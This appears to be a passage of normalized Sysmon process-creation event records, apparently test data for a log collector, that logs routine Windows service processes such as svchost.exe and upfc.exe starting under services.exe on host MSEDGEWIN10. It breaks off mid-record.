"generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\System32\\svchost.exe -k netsvcs -p -s Themes", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b765-5ea4-0000-0010ea0a0100", "object.process.hash.imphash": 
"247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "1640", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:17.402Z", "type": "raw", "uuid": "c6acf4de-6376-4695-b99b-5b85cdc004c5"}
+{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:26.5403388Z\"},\"EventRecordID\":\"27501\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:17.399\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-00108b0a0100}\"},{\"Name\":\"ProcessId\",\"text\":\"1624\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k LocalSystemNetworkRestricted -p -s SysMain\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k LocalSystemNetworkRestricted -p -s SysMain", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b765-5ea4-0000-00108b0a0100", 
"object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "1624", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:17.399Z", "type": "raw", "uuid": "ae086f39-0de7-459e-b369-d9a1c897c64e"}
+{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:26.5368260Z\"},\"EventRecordID\":\"27500\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:17.398\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-0010550a0100}\"},{\"Name\":\"ProcessId\",\"text\":\"1616\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k LocalService -p -s EventSystem\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\LOCAL 
SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e5030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e5\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e5030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:local service@nt authority", "object.account.name": "local service", "object.account.privileges": "System", "object.account.session_id": "997", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k LocalService -p -s EventSystem", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b765-5ea4-0000-0010550a0100", 
"object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "1616", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:local service@nt authority", "subject.account.name": "local service", "subject.account.privileges": "System", "subject.account.session_id": "997", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:17.398Z", "type": "raw", "uuid": "8a32e5f5-684a-48c2-bf51-ffc3cd25549d"}
+{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:26.5075999Z\"},\"EventRecordID\":\"27496\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:17.344\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-001055010100}\"},{\"Name\":\"ProcessId\",\"text\":\"1536\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k NetworkService -p -s Dnscache\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\NETWORK 
SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e4030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e4\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e4030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:network service@nt authority", "object.account.name": "network service", "object.account.privileges": "System", "object.account.session_id": "996", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k NetworkService -p -s Dnscache", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b765-5ea4-0000-001055010100", 
"object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "1536", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:network service@nt authority", "subject.account.name": "network service", "subject.account.privileges": "System", "subject.account.session_id": "996", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:17.344Z", "type": "raw", "uuid": "69087092-8add-4674-be78-45440f92ccb7"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:26.3031689Z\"},\"EventRecordID\":\"27492\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:17.316\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-0010edfc0000}\"},{\"Name\":\"ProcessId\",\"text\":\"1500\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k NetworkService -p -s NlaSvc\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\NETWORK 
SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e4030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e4\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e4030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:network service@nt authority", "object.account.name": "network service", "object.account.privileges": "System", "object.account.session_id": "996", "object.process.cmdline": "C:\\Windows\\System32\\svchost.exe -k NetworkService -p -s NlaSvc", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b765-5ea4-0000-0010edfc0000", 
"object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "1500", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:network service@nt authority", "subject.account.name": "network service", "subject.account.privileges": "System", "subject.account.session_id": "996", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:17.316Z", "type": "raw", "uuid": "7629abf1-f1a4-4362-8a01-e65a33ffc5e6"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:26.1580427Z\"},\"EventRecordID\":\"27488\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:17.190\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-00107df10000}\"},{\"Name\":\"ProcessId\",\"text\":\"1380\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\upfc.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Updateability From SCM\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"upfc.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\System32\\\\Upfc.exe /launchtype boot /cv pVnjz5d3jkOKEwXZiJ9/ng.0\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=D35A6D77ACF8E9AC80E345BDE15032AE632A976D,MD5=AC3DA8AAC02C94DC65ECDF9548E6372D,SHA256=AE4B0E81C601521DA974D53E44295C98331CED7C9CC2F260434E6BC0C475DDA3,IMPHASH=B3371ED99D25FEFF460973E2D1E5A076\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\System32\\Upfc.exe /launchtype boot /cv pVnjz5d3jkOKEwXZiJ9/ng.0", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\upfc.exe", "object.process.guid": "747f3d96-b765-5ea4-0000-00107df10000", 
"object.process.hash.imphash": "B3371ED99D25FEFF460973E2D1E5A076", "object.process.hash.md5": "AC3DA8AAC02C94DC65ECDF9548E6372D", "object.process.hash.sha1": "D35A6D77ACF8E9AC80E345BDE15032AE632A976D", "object.process.hash.sha256": "AE4B0E81C601521DA974D53E44295C98331CED7C9CC2F260434E6BC0C475DDA3", "object.process.id": "1380", "object.process.meta": "Description:Updateability From SCM | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "upfc.exe", "object.process.original_name": "upfc.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:17.190Z", "type": "raw", "uuid": "f3ae18b2-9d7f-4291-bede-6f4e29542d38"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:25.6036170Z\"},\"EventRecordID\":\"27483\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 